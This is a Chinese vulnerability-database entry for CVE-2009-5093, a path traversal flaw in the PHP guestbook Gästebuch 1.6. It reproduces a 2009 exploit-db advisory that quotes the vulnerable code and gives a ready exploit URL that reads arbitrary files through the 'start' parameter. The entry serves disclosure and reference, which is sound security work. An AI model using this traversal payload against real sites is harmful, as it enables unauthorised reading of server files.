Gastebuch gastbuch.php目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117366 漏洞类型 路径遍历
发布时间 2009-02-09 更新时间 2020-02-12
CVE编号 CVE-2009-5093 CNNVD-ID CNNVD-201109-117
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/8027
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201109-117
|漏洞详情
Gästebuch (Gastebuch) 1.6版本的gastbuch.php中存在路径遍历漏洞。远程攻击者可借助start参数中的“..”(点点)操作符读取任意文件。
|漏洞EXP
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
               +                                                                +
               + Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
               +                                                                +
               +                     bd0rk || SOH-Crew                          +
               +                                                                +
               ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



=> Vendor: http://www.php4scripte.de/

=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip

=> Bugfound3R: bd0rk

=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)

=> Vulnerable Code in gastbuch.php line 2-3

        -------------------------------
                              
           if (isset($_GET['start'])) {
           $start=$_GET['start'];

        -------------------------------


[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php


                  ###The 20 years old, german Hacker bd0rk###

# milw0rm.com [2009-02-09]
|参考资料

来源:XF
名称:gastbuch-gastbuch-file-include(48644)
链接:http://xforce.iss.net/xforce/xfdb/48644
来源:BID
名称:33707
链接:http://www.securityfocus.com/bid/33707
来源:MILW0RM
名称:8027
链接:http://www.milw0rm.com/exploits/8027
来源:EXPLOIT-DB
名称:8027
链接:http://www.exploit-db.com/exploits/8027